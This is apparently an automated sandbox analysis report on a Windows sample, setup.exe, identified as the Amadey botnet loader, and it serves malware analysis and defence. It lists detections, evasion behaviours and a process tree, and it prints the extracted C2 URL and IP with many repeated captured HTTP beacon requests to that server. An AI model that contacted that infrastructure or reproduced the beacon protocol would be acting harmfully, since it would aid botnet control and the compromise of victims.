Edit tour

Windows Analysis Report
setup.exe

Overview

General Information

Sample name:	setup.exe
Analysis ID:	1465704
MD5:	eaa443f37443cb7221d63e0891243384
SHA1:	d3242326b2ac1ae6e9817a49df33c3a79e209aee
SHA256:	bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13
Tags:	Amadeyexe
Infos:

Detection

Amadey

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Amadeys stealer DLL

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Drops PE files

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

setup.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: EAA443F37443CB7221D63E0891243384)

axplong.exe (PID: 7564 cmdline: "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe" MD5: EAA443F37443CB7221D63E0891243384)

axplong.exe (PID: 7548 cmdline: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe MD5: EAA443F37443CB7221D63E0891243384)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": ["http://77.91.77.81/Kiru9gu/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.1699386717.0000000005530000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.1701798029.0000000000361000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.1740305349.0000000001001000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000003.1699458271.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.1661502263.0000000004930000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.axplong.exe.1000000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
1.2.axplong.exe.1000000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.setup.exe.360000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.4 - Destination IP: 77.91.77.81

Timestamp:	07/02/24-00:25:04.486423
SID:	2856147
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: setup.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://77.91.77.81/	Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/Kiru9gu/index.php2	Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/Kiru9gu/index.php	Avira URL Cloud: Label: malware
Source: http://77.91.77.81/Kiru9gu/index.phpm32	Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/Kiru9gu/index.phpR-	Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/Kiru9gu/index.phpl	Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/Kiru9gu/index.phpem32	Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/Kiru9gu/index.phpoS	Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/Kiru9gu/index.phptI	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: axplong.exe.7548.1.memstrmin

Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.81/Kiru9gu/index.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

ReversingLabs: Detection: 72%

Multi AV Scanner detection for submitted file

Source: setup.exe

ReversingLabs: Detection: 72%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: setup.exe

Joe Sandbox ML: detected

Source: setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49730 -> 77.91.77.81:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 77.91.77.81

Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
